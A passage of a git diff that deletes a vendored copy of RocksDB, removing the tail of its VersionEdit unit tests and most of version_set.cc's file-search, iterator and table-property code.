-                 InternalKey("zoo", kBig + 600 + i, kTypeDeletion),
-                 kBig + 500 + i, kBig + 600 + i, false);
-    edit.DeleteFile(4, kBig + 700 + i);
-  }
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-  TestEncodeDecode(edit);
-}
-
-TEST_F(VersionEditTest, EncodeDecodeNewFile4) {
-  static const uint64_t kBig = 1ull << 50;
-
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-  edit.AddFile(4, 301, 3, 100, InternalKey("foo", kBig + 501, kTypeValue),
-               InternalKey("zoo", kBig + 601, kTypeDeletion), kBig + 501,
-               kBig + 601, false);
-  edit.AddFile(5, 302, 0, 100, InternalKey("foo", kBig + 502, kTypeValue),
-               InternalKey("zoo", kBig + 602, kTypeDeletion), kBig + 502,
-               kBig + 602, true);
-
-  edit.DeleteFile(4, 700);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-  TestEncodeDecode(edit);
-
-  std::string encoded, encoded2;
-  edit.EncodeTo(&encoded);
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  auto& new_files = parsed.GetNewFiles();
-  ASSERT_TRUE(new_files[0].second.marked_for_compaction);
-  ASSERT_TRUE(!new_files[1].second.marked_for_compaction);
-  ASSERT_TRUE(new_files[2].second.marked_for_compaction);
-  ASSERT_EQ(3, new_files[0].second.fd.GetPathId());
-  ASSERT_EQ(3, new_files[1].second.fd.GetPathId());
-  ASSERT_EQ(0, new_files[2].second.fd.GetPathId());
-}
-
-TEST_F(VersionEditTest, ForwardCompatibleNewFile4) {
-  static const uint64_t kBig = 1ull << 50;
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-  edit.AddFile(4, 301, 3, 100, InternalKey("foo", kBig + 501, kTypeValue),
-               InternalKey("zoo", kBig + 601, kTypeDeletion), kBig + 501,
-               kBig + 601, false);
-  edit.DeleteFile(4, 700);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-
-  std::string encoded;
-
-  // Call back function to add extra customized builds.
-  bool first = true;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "VersionEdit::EncodeTo:NewFile4:CustomizeFields", [&](void* arg) {
-        std::string* str = reinterpret_cast<std::string*>(arg);
-        PutVarint32(str, 33);
-        const std::string str1 = "random_string";
-        PutLengthPrefixedSlice(str, str1);
-        if (first) {
-          first = false;
-          PutVarint32(str, 22);
-          const std::string str2 = "s";
-          PutLengthPrefixedSlice(str, str2);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  edit.EncodeTo(&encoded);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_TRUE(!first);
-  auto& new_files = parsed.GetNewFiles();
-  ASSERT_TRUE(new_files[0].second.marked_for_compaction);
-  ASSERT_TRUE(!new_files[1].second.marked_for_compaction);
-  ASSERT_EQ(3, new_files[0].second.fd.GetPathId());
-  ASSERT_EQ(3, new_files[1].second.fd.GetPathId());
-  ASSERT_EQ(1u, parsed.GetDeletedFiles().size());
-}
-
-TEST_F(VersionEditTest, NewFile4NotSupportedField) {
-  static const uint64_t kBig = 1ull << 50;
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-
-  std::string encoded;
-
-  // Call back function to add extra customized builds.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "VersionEdit::EncodeTo:NewFile4:CustomizeFields", [&](void* arg) {
-        std::string* str = reinterpret_cast<std::string*>(arg);
-        const std::string str1 = "s";
-        PutLengthPrefixedSlice(str, str1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  edit.EncodeTo(&encoded);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_NOK(s);
-}
-
-TEST_F(VersionEditTest, EncodeEmptyFile) {
-  VersionEdit edit;
-  edit.AddFile(0, 0, 0, 0, InternalKey(), InternalKey(), 0, 0, false);
-  std::string buffer;
-  ASSERT_TRUE(!edit.EncodeTo(&buffer));
-}
-
-TEST_F(VersionEditTest, ColumnFamilyTest) {
-  VersionEdit edit;
-  edit.SetColumnFamily(2);
-  edit.AddColumnFamily("column_family");
-  edit.SetMaxColumnFamily(5);
-  TestEncodeDecode(edit);
-
-  edit.Clear();
-  edit.SetColumnFamily(3);
-  edit.DropColumnFamily();
-  TestEncodeDecode(edit);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/version_set.cc b/thirdparty/rocksdb/db/version_set.cc
deleted file mode 100644
index 782ebc2..0000000
--- a/thirdparty/rocksdb/db/version_set.cc
+++ /dev/null
@@ -1,3814 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_set.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
-#include <algorithm>
-#include <climits>
-#include <map>
-#include <set>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "db/compaction.h"
-#include "db/internal_stats.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/table_cache.h"
-#include "db/version_builder.h"
-#include "monitoring/file_read_sample.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/format.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/merging_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_reader.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-
-// Find File in LevelFilesBrief data structure
-// Within an index range defined by left and right
-int FindFileInRange(const InternalKeyComparator& icmp,
-    const LevelFilesBrief& file_level,
-    const Slice& key,
-    uint32_t left,
-    uint32_t right) {
-  while (left < right) {
-    uint32_t mid = (left + right) / 2;
-    const FdWithKeyRange& f = file_level.files[mid];
-    if (icmp.InternalKeyComparator::Compare(f.largest_key, key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-// Class to help choose the next file to search for the particular key.
-// Searches and returns files level by level.
-// We can search level-by-level since entries never hop across
-// levels. Therefore we are guaranteed that if we find data
-// in a smaller level, later levels are irrelevant (unless we
-// are MergeInProgress).
-class FilePicker {
- public:
-  FilePicker(std::vector<FileMetaData*>* files, const Slice& user_key,
-             const Slice& ikey, autovector<LevelFilesBrief>* file_levels,
-             unsigned int num_levels, FileIndexer* file_indexer,
-             const Comparator* user_comparator,
-             const InternalKeyComparator* internal_comparator)
-      : num_levels_(num_levels),
-        curr_level_(static_cast<unsigned int>(-1)),
-        returned_file_level_(static_cast<unsigned int>(-1)),
-        hit_file_level_(static_cast<unsigned int>(-1)),
-        search_left_bound_(0),
-        search_right_bound_(FileIndexer::kLevelMaxIndex),
-#ifndef NDEBUG
-        files_(files),
-#endif
-        level_files_brief_(file_levels),
-        is_hit_file_last_in_level_(false),
-        user_key_(user_key),
-        ikey_(ikey),
-        file_indexer_(file_indexer),
-        user_comparator_(user_comparator),
-        internal_comparator_(internal_comparator) {
-    // Setup member variables to search first level.
-    search_ended_ = !PrepareNextLevel();
-    if (!search_ended_) {
-      // Prefetch Level 0 table data to avoid cache miss if possible.
-      for (unsigned int i = 0; i < (*level_files_brief_)[0].num_files; ++i) {
-        auto* r = (*level_files_brief_)[0].files[i].fd.table_reader;
-        if (r) {
-          r->Prepare(ikey);
-        }
-      }
-    }
-  }
-
-  int GetCurrentLevel() const { return curr_level_; }
-
-  FdWithKeyRange* GetNextFile() {
-    while (!search_ended_) {  // Loops over different levels.
-      while (curr_index_in_curr_level_ < curr_file_level_->num_files) {
-        // Loops over all files in current level.
-        FdWithKeyRange* f = &curr_file_level_->files[curr_index_in_curr_level_];
-        hit_file_level_ = curr_level_;
-        is_hit_file_last_in_level_ =
-            curr_index_in_curr_level_ == curr_file_level_->num_files - 1;
-        int cmp_largest = -1;
-
-        // Do key range filtering of files or/and fractional cascading if:
-        // (1) not all the files are in level 0, or
-        // (2) there are more than 3 current level files
-        // If there are only 3 or less current level files in the system, we skip
-        // the key range filtering. In this case, more likely, the system is
-        // highly tuned to minimize number of tables queried by each query,
-        // so it is unlikely that key range filtering is more efficient than
-        // querying the files.
-        if (num_levels_ > 1 || curr_file_level_->num_files > 3) {
-          // Check if key is within a file's range. If search left bound and
-          // right bound point to the same find, we are sure key falls in
-          // range.
-          assert(
-              curr_level_ == 0 ||
-              curr_index_in_curr_level_ == start_index_in_curr_level_ ||
-              user_comparator_->Compare(user_key_,
-                ExtractUserKey(f->smallest_key)) <= 0);
-
-          int cmp_smallest = user_comparator_->Compare(user_key_,
-              ExtractUserKey(f->smallest_key));
-          if (cmp_smallest >= 0) {
-            cmp_largest = user_comparator_->Compare(user_key_,
-                ExtractUserKey(f->largest_key));
-          }
-
-          // Setup file search bound for the next level based on the
-          // comparison results
-          if (curr_level_ > 0) {
-            file_indexer_->GetNextLevelIndex(curr_level_,
-                                            curr_index_in_curr_level_,
-                                            cmp_smallest, cmp_largest,
-                                            &search_left_bound_,
-                                            &search_right_bound_);
-          }
-          // Key falls out of current file's range
-          if (cmp_smallest < 0 || cmp_largest > 0) {
-            if (curr_level_ == 0) {
-              ++curr_index_in_curr_level_;
-              continue;
-            } else {
-              // Search next level.
-              break;
-            }
-          }
-        }
-#ifndef NDEBUG
-        // Sanity check to make sure that the files are correctly sorted
-        if (prev_file_) {
-          if (curr_level_ != 0) {
-            int comp_sign = internal_comparator_->Compare(
-                prev_file_->largest_key, f->smallest_key);
-            assert(comp_sign < 0);
-          } else {
-            // level == 0, the current file cannot be newer than the previous
-            // one. Use compressed data structure, has no attribute seqNo
-            assert(curr_index_in_curr_level_ > 0);
-            assert(!NewestFirstBySeqNo(files_[0][curr_index_in_curr_level_],
-                  files_[0][curr_index_in_curr_level_-1]));
-          }
-        }
-        prev_file_ = f;
-#endif
-        returned_file_level_ = curr_level_;
-        if (curr_level_ > 0 && cmp_largest < 0) {
-          // No more files to search in this level.
-          search_ended_ = !PrepareNextLevel();
-        } else {
-          ++curr_index_in_curr_level_;
-        }
-        return f;
-      }
-      // Start searching next level.
-      search_ended_ = !PrepareNextLevel();
-    }
-    // Search ended.
-    return nullptr;
-  }
-
-  // getter for current file level
-  // for GET_HIT_L0, GET_HIT_L1 & GET_HIT_L2_AND_UP counts
-  unsigned int GetHitFileLevel() { return hit_file_level_; }
-
-  // Returns true if the most recent "hit file" (i.e., one returned by
-  // GetNextFile()) is at the last index in its level.
-  bool IsHitFileLastInLevel() { return is_hit_file_last_in_level_; }
-
- private:
-  unsigned int num_levels_;
-  unsigned int curr_level_;
-  unsigned int returned_file_level_;
-  unsigned int hit_file_level_;
-  int32_t search_left_bound_;
-  int32_t search_right_bound_;
-#ifndef NDEBUG
-  std::vector<FileMetaData*>* files_;
-#endif
-  autovector<LevelFilesBrief>* level_files_brief_;
-  bool search_ended_;
-  bool is_hit_file_last_in_level_;
-  LevelFilesBrief* curr_file_level_;
-  unsigned int curr_index_in_curr_level_;
-  unsigned int start_index_in_curr_level_;
-  Slice user_key_;
-  Slice ikey_;
-  FileIndexer* file_indexer_;
-  const Comparator* user_comparator_;
-  const InternalKeyComparator* internal_comparator_;
-#ifndef NDEBUG
-  FdWithKeyRange* prev_file_;
-#endif
-
-  // Setup local variables to search next level.
-  // Returns false if there are no more levels to search.
-  bool PrepareNextLevel() {
-    curr_level_++;
-    while (curr_level_ < num_levels_) {
-      curr_file_level_ = &(*level_files_brief_)[curr_level_];
-      if (curr_file_level_->num_files == 0) {
-        // When current level is empty, the search bound generated from upper
-        // level must be [0, -1] or [0, FileIndexer::kLevelMaxIndex] if it is
-        // also empty.
-        assert(search_left_bound_ == 0);
-        assert(search_right_bound_ == -1 ||
-               search_right_bound_ == FileIndexer::kLevelMaxIndex);
-        // Since current level is empty, it will need to search all files in
-        // the next level
-        search_left_bound_ = 0;
-        search_right_bound_ = FileIndexer::kLevelMaxIndex;
-        curr_level_++;
-        continue;
-      }
-
-      // Some files may overlap each other. We find
-      // all files that overlap user_key and process them in order from
-      // newest to oldest. In the context of merge-operator, this can occur at
-      // any level. Otherwise, it only occurs at Level-0 (since Put/Deletes
-      // are always compacted into a single entry).
-      int32_t start_index;
-      if (curr_level_ == 0) {
-        // On Level-0, we read through all files to check for overlap.
-        start_index = 0;
-      } else {
-        // On Level-n (n>=1), files are sorted. Binary search to find the
-        // earliest file whose largest key >= ikey. Search left bound and
-        // right bound are used to narrow the range.
-        if (search_left_bound_ == search_right_bound_) {
-          start_index = search_left_bound_;
-        } else if (search_left_bound_ < search_right_bound_) {
-          if (search_right_bound_ == FileIndexer::kLevelMaxIndex) {
-            search_right_bound_ =
-                static_cast<int32_t>(curr_file_level_->num_files) - 1;
-          }
-          start_index =
-              FindFileInRange(*internal_comparator_, *curr_file_level_, ikey_,
-                              static_cast<uint32_t>(search_left_bound_),
-                              static_cast<uint32_t>(search_right_bound_));
-        } else {
-          // search_left_bound > search_right_bound, key does not exist in
-          // this level. Since no comparison is done in this level, it will
-          // need to search all files in the next level.
-          search_left_bound_ = 0;
-          search_right_bound_ = FileIndexer::kLevelMaxIndex;
-          curr_level_++;
-          continue;
-        }
-      }
-      start_index_in_curr_level_ = start_index;
-      curr_index_in_curr_level_ = start_index;
-#ifndef NDEBUG
-      prev_file_ = nullptr;
-#endif
-      return true;
-    }
-    // curr_level_ = num_levels_. So, no more levels to search.
-    return false;
-  }
-};
-}  // anonymous namespace
-
-VersionStorageInfo::~VersionStorageInfo() { delete[] files_; }
-
-Version::~Version() {
-  assert(refs_ == 0);
-
-  // Remove from linked list
-  prev_->next_ = next_;
-  next_->prev_ = prev_;
-
-  // Drop references to files
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    for (size_t i = 0; i < storage_info_.files_[level].size(); i++) {
-      FileMetaData* f = storage_info_.files_[level][i];
-      assert(f->refs > 0);
-      f->refs--;
-      if (f->refs <= 0) {
-        vset_->obsolete_files_.push_back(f);
-      }
-    }
-  }
-}
-
-int FindFile(const InternalKeyComparator& icmp,
-             const LevelFilesBrief& file_level,
-             const Slice& key) {
-  return FindFileInRange(icmp, file_level, key, 0,
-                         static_cast<uint32_t>(file_level.num_files));
-}
-
-void DoGenerateLevelFilesBrief(LevelFilesBrief* file_level,
-        const std::vector<FileMetaData*>& files,
-        Arena* arena) {
-  assert(file_level);
-  assert(arena);
-
-  size_t num = files.size();
-  file_level->num_files = num;
-  char* mem = arena->AllocateAligned(num * sizeof(FdWithKeyRange));
-  file_level->files = new (mem)FdWithKeyRange[num];
-
-  for (size_t i = 0; i < num; i++) {
-    Slice smallest_key = files[i]->smallest.Encode();
-    Slice largest_key = files[i]->largest.Encode();
-
-    // Copy key slice to sequential memory
-    size_t smallest_size = smallest_key.size();
-    size_t largest_size = largest_key.size();
-    mem = arena->AllocateAligned(smallest_size + largest_size);
-    memcpy(mem, smallest_key.data(), smallest_size);
-    memcpy(mem + smallest_size, largest_key.data(), largest_size);
-
-    FdWithKeyRange& f = file_level->files[i];
-    f.fd = files[i]->fd;
-    f.file_metadata = files[i];
-    f.smallest_key = Slice(mem, smallest_size);
-    f.largest_key = Slice(mem + smallest_size, largest_size);
-  }
-}
-
-static bool AfterFile(const Comparator* ucmp,
-                      const Slice* user_key, const FdWithKeyRange* f) {
-  // nullptr user_key occurs before all keys and is therefore never after *f
-  return (user_key != nullptr &&
-          ucmp->Compare(*user_key, ExtractUserKey(f->largest_key)) > 0);
-}
-
-static bool BeforeFile(const Comparator* ucmp,
-                       const Slice* user_key, const FdWithKeyRange* f) {
-  // nullptr user_key occurs after all keys and is therefore never before *f
-  return (user_key != nullptr &&
-          ucmp->Compare(*user_key, ExtractUserKey(f->smallest_key)) < 0);
-}
-
-bool SomeFileOverlapsRange(
-    const InternalKeyComparator& icmp,
-    bool disjoint_sorted_files,
-    const LevelFilesBrief& file_level,
-    const Slice* smallest_user_key,
-    const Slice* largest_user_key) {
-  const Comparator* ucmp = icmp.user_comparator();
-  if (!disjoint_sorted_files) {
-    // Need to check against all files
-    for (size_t i = 0; i < file_level.num_files; i++) {
-      const FdWithKeyRange* f = &(file_level.files[i]);
-      if (AfterFile(ucmp, smallest_user_key, f) ||
-          BeforeFile(ucmp, largest_user_key, f)) {
-        // No overlap
-      } else {
-        return true;  // Overlap
-      }
-    }
-    return false;
-  }
-
-  // Binary search over file list
-  uint32_t index = 0;
-  if (smallest_user_key != nullptr) {
-    // Find the earliest possible internal key for smallest_user_key
-    InternalKey small;
-    small.SetMaxPossibleForUserKey(*smallest_user_key);
-    index = FindFile(icmp, file_level, small.Encode());
-  }
-
-  if (index >= file_level.num_files) {
-    // beginning of range is after all files, so no overlap.
-    return false;
-  }
-
-  return !BeforeFile(ucmp, largest_user_key, &file_level.files[index]);
-}
-
-namespace {
-
-// An internal iterator.  For a given version/level pair, yields
-// information about the files in the level.  For a given entry, key()
-// is the largest key that occurs in the file, and value() is an
-// 16-byte value containing the file number and file size, both
-// encoded using EncodeFixed64.
-class LevelFileNumIterator : public InternalIterator {
- public:
-  LevelFileNumIterator(const InternalKeyComparator& icmp,
-                       const LevelFilesBrief* flevel, bool should_sample)
-      : icmp_(icmp),
-        flevel_(flevel),
-        index_(static_cast<uint32_t>(flevel->num_files)),
-        current_value_(0, 0, 0),  // Marks as invalid
-        should_sample_(should_sample) {}
-  virtual bool Valid() const override { return index_ < flevel_->num_files; }
-  virtual void Seek(const Slice& target) override {
-    index_ = FindFile(icmp_, *flevel_, target);
-  }
-  virtual void SeekForPrev(const Slice& target) override {
-    SeekForPrevImpl(target, &icmp_);
-  }
-
-  virtual void SeekToFirst() override { index_ = 0; }
-  virtual void SeekToLast() override {
-    index_ = (flevel_->num_files == 0)
-                 ? 0
-                 : static_cast<uint32_t>(flevel_->num_files) - 1;
-  }
-  virtual void Next() override {
-    assert(Valid());
-    index_++;
-  }
-  virtual void Prev() override {
-    assert(Valid());
-    if (index_ == 0) {
-      index_ = static_cast<uint32_t>(flevel_->num_files);  // Marks as invalid
-    } else {
-      index_--;
-    }
-  }
-  Slice key() const override {
-    assert(Valid());
-    return flevel_->files[index_].largest_key;
-  }
-  Slice value() const override {
-    assert(Valid());
-
-    auto file_meta = flevel_->files[index_];
-    if (should_sample_) {
-      sample_file_read_inc(file_meta.file_metadata);
-    }
-    current_value_ = file_meta.fd;
-    return Slice(reinterpret_cast<const char*>(&current_value_),
-                 sizeof(FileDescriptor));
-  }
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  const InternalKeyComparator icmp_;
-  const LevelFilesBrief* flevel_;
-  uint32_t index_;
-  mutable FileDescriptor current_value_;
-  bool should_sample_;
-};
-
-class LevelFileIteratorState : public TwoLevelIteratorState {
- public:
-  // @param skip_filters Disables loading/accessing the filter block
-  LevelFileIteratorState(TableCache* table_cache,
-                         const ReadOptions& read_options,
-                         const EnvOptions& env_options,
-                         const InternalKeyComparator& icomparator,
-                         HistogramImpl* file_read_hist, bool for_compaction,
-                         bool prefix_enabled, bool skip_filters, int level,
-                         RangeDelAggregator* range_del_agg)
-      : TwoLevelIteratorState(prefix_enabled),
-        table_cache_(table_cache),
-        read_options_(read_options),
-        env_options_(env_options),
-        icomparator_(icomparator),
-        file_read_hist_(file_read_hist),
-        for_compaction_(for_compaction),
-        skip_filters_(skip_filters),
-        level_(level),
-        range_del_agg_(range_del_agg) {}
-
-  InternalIterator* NewSecondaryIterator(const Slice& meta_handle) override {
-    if (meta_handle.size() != sizeof(FileDescriptor)) {
-      return NewErrorInternalIterator(
-          Status::Corruption("FileReader invoked with unexpected value"));
-    }
-    const FileDescriptor* fd =
-        reinterpret_cast<const FileDescriptor*>(meta_handle.data());
-    return table_cache_->NewIterator(
-        read_options_, env_options_, icomparator_, *fd, range_del_agg_,
-        nullptr /* don't need reference to table */, file_read_hist_,
-        for_compaction_, nullptr /* arena */, skip_filters_, level_);
-  }
-
-  bool PrefixMayMatch(const Slice& internal_key) override {
-    return true;
-  }
-
-  bool KeyReachedUpperBound(const Slice& internal_key) override {
-    return read_options_.iterate_upper_bound != nullptr &&
-           icomparator_.user_comparator()->Compare(
-               ExtractUserKey(internal_key),
-               *read_options_.iterate_upper_bound) >= 0;
-  }
-
- private:
-  TableCache* table_cache_;
-  const ReadOptions read_options_;
-  const EnvOptions& env_options_;
-  const InternalKeyComparator& icomparator_;
-  HistogramImpl* file_read_hist_;
-  bool for_compaction_;
-  bool skip_filters_;
-  int level_;
-  RangeDelAggregator* range_del_agg_;
-};
-
-// A wrapper of version builder which references the current version in
-// constructor and unref it in the destructor.
-// Both of the constructor and destructor need to be called inside DB Mutex.
-class BaseReferencedVersionBuilder {
- public:
-  explicit BaseReferencedVersionBuilder(ColumnFamilyData* cfd)
-      : version_builder_(new VersionBuilder(
-            cfd->current()->version_set()->env_options(), cfd->table_cache(),
-            cfd->current()->storage_info(), cfd->ioptions()->info_log)),
-        version_(cfd->current()) {
-    version_->Ref();
-  }
-  ~BaseReferencedVersionBuilder() {
-    delete version_builder_;
-    version_->Unref();
-  }
-  VersionBuilder* version_builder() { return version_builder_; }
-
- private:
-  VersionBuilder* version_builder_;
-  Version* version_;
-};
-}  // anonymous namespace
-
-Status Version::GetTableProperties(std::shared_ptr<const TableProperties>* tp,
-                                   const FileMetaData* file_meta,
-                                   const std::string* fname) const {
-  auto table_cache = cfd_->table_cache();
-  auto ioptions = cfd_->ioptions();
-  Status s = table_cache->GetTableProperties(
-      vset_->env_options_, cfd_->internal_comparator(), file_meta->fd,
-      tp, true /* no io */);
-  if (s.ok()) {
-    return s;
-  }
-
-  // We only ignore error type `Incomplete` since it's by design that we
-  // disallow table when it's not in table cache.
-  if (!s.IsIncomplete()) {
-    return s;
-  }
-
-  // 2. Table is not present in table cache, we'll read the table properties
-  // directly from the properties block in the file.
-  std::unique_ptr<RandomAccessFile> file;
-  std::string file_name;
-  if (fname != nullptr) {
-    file_name = *fname;
-  } else {
-    file_name =
-      TableFileName(vset_->db_options_->db_paths, file_meta->fd.GetNumber(),
-                    file_meta->fd.GetPathId());
-  }
-  s = ioptions->env->NewRandomAccessFile(file_name, &file, vset_->env_options_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  TableProperties* raw_table_properties;
-  // By setting the magic number to kInvalidTableMagicNumber, we can by
-  // pass the magic number check in the footer.
-  std::unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(file), file_name));
-  s = ReadTableProperties(
-      file_reader.get(), file_meta->fd.GetFileSize(),
-      Footer::kInvalidTableMagicNumber /* table's magic number */, *ioptions, &raw_table_properties);
-  if (!s.ok()) {
-    return s;
-  }
-  RecordTick(ioptions->statistics, NUMBER_DIRECT_LOAD_TABLE_PROPERTIES);
-
-  *tp = std::shared_ptr<const TableProperties>(raw_table_properties);
-  return s;
-}
-
-Status Version::GetPropertiesOfAllTables(TablePropertiesCollection* props) {
-  Status s;
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    s = GetPropertiesOfAllTables(props, level);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetPropertiesOfAllTables(TablePropertiesCollection* props,
-                                         int level) {
-  for (const auto& file_meta : storage_info_.files_[level]) {
-    auto fname =
-        TableFileName(vset_->db_options_->db_paths, file_meta->fd.GetNumber(),
-                      file_meta->fd.GetPathId());
-    // 1. If the table is already present in table cache, load table
-    // properties from there.
-    std::shared_ptr<const TableProperties> table_properties;
-    Status s = GetTableProperties(&table_properties, file_meta, &fname);
-    if (s.ok()) {
-      props->insert({fname, table_properties});
-    } else {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetPropertiesOfTablesInRange(
-    const Range* range, std::size_t n, TablePropertiesCollection* props) const {
-  for (int level = 0; level < storage_info_.num_non_empty_levels(); level++) {
-    for (decltype(n) i = 0; i < n; i++) {
-      // Convert user_key into a corresponding internal key.
-      InternalKey k1(range[i].start, kMaxSequenceNumber, kValueTypeForSeek);
-      InternalKey k2(range[i].limit, kMaxSequenceNumber, kValueTypeForSeek);
-      std::vector<FileMetaData*> files;
-      storage_info_.GetOverlappingInputs(level, &k1, &k2, &files, -1, nullptr,
-                                         false);
-      for (const auto& file_meta : files) {
-        auto fname =
-            TableFileName(vset_->db_options_->db_paths,
-                          file_meta->fd.GetNumber(), file_meta->fd.GetPathId());
-        if (props->count(fname) == 0) {
-          // 1. If the table is already present in table cache, load table
-          // properties from there.
-          std::shared_ptr<const TableProperties> table_properties;
-          Status s = GetTableProperties(&table_properties, file_meta, &fname);
-          if (s.ok()) {
-            props->insert({fname, table_properties});
-          } else {
-            return s;
-          }
-        }
-      }
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetAggregatedTableProperties(
-    std::shared_ptr<const TableProperties>* tp, int level) {
-  TablePropertiesCollection props;
-  Status s;
-  if (level < 0) {
-    s = GetPropertiesOfAllTables(&props);
-  } else {
-    s = GetPropertiesOfAllTables(&props, level);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto* new_tp = new TableProperties();
-  for (const auto& item : props) {
-    new_tp->Add(*item.second);
-  }
-  tp->reset(new_tp);
-  return Status::OK();
-}
-
-size_t Version::GetMemoryUsageByTableReaders() {
-  size_t total_usage = 0;
-  for (auto& file_level : storage_info_.level_files_brief_) {
-    for (size_t i = 0; i < file_level.num_files; i++) {
-      total_usage += cfd_->table_cache()->GetMemoryUsageByTableReader(
-          vset_->env_options_, cfd_->internal_comparator(),
-          file_level.files[i].fd);
-    }
-  }
-  return total_usage;
-}
-
-void Version::GetColumnFamilyMetaData(ColumnFamilyMetaData* cf_meta) {
-  assert(cf_meta);
-  assert(cfd_);
-
-  cf_meta->name = cfd_->GetName();
-  cf_meta->size = 0;
-  cf_meta->file_count = 0;
-  cf_meta->levels.clear();
-
-  auto* ioptions = cfd_->ioptions();
-  auto* vstorage = storage_info();
-
-  for (int level = 0; level < cfd_->NumberLevels(); level++) {
-    uint64_t level_size = 0;
-    cf_meta->file_count += vstorage->LevelFiles(level).size();
-    std::vector<SstFileMetaData> files;
-    for (const auto& file : vstorage->LevelFiles(level)) {
-      uint32_t path_id = file->fd.GetPathId();
-      std::string file_path;
-      if (path_id < ioptions->db_paths.size()) {
-        file_path = ioptions->db_paths[path_id].path;
-      } else {
-        assert(!ioptions->db_paths.empty());
-        file_path = ioptions->db_paths.back().path;
-      }
-      files.emplace_back(
-          MakeTableFileName("", file->fd.GetNumber()), file_path,
-          file->fd.GetFileSize(), file->smallest_seqno, file->largest_seqno,
-          file->smallest.user_key().ToString(),
-          file->largest.user_key().ToString(),
-          file->stats.num_reads_sampled.load(std::memory_order_relaxed),
-          file->being_compacted);
-      level_size += file->fd.GetFileSize();
-    }
-    cf_meta->levels.emplace_back(
-        level, level_size, std::move(files));
-    cf_meta->size += level_size;
-  }
-}
-
-
-uint64_t VersionStorageInfo::GetEstimatedActiveKeys() const {
-  // Estimation will be inaccurate when:
-  // (1) there exist merge keys
-  // (2) keys are directly overwritten
-  // (3) deletion on non-existing keys
-  // (4) low number of samples
-  if (current_num_samples_ == 0) {
-    return 0;
-  }
-
-  if (current_num_non_deletions_ <= current_num_deletions_) {
-    return 0;
-  }
-
-  uint64_t est = current_num_non_deletions_ - current_num_deletions_;
-
-  uint64_t file_count = 0;
-  for (int level = 0; level < num_levels_; ++level) {
-    file_count += files_[level].size();
-  }
-
-  if (current_num_samples_ < file_count) {
-    // casting to avoid overflowing
-    return
-      static_cast<uint64_t>(
-        (est * static_cast<double>(file_count) / current_num_samples_)
-      );
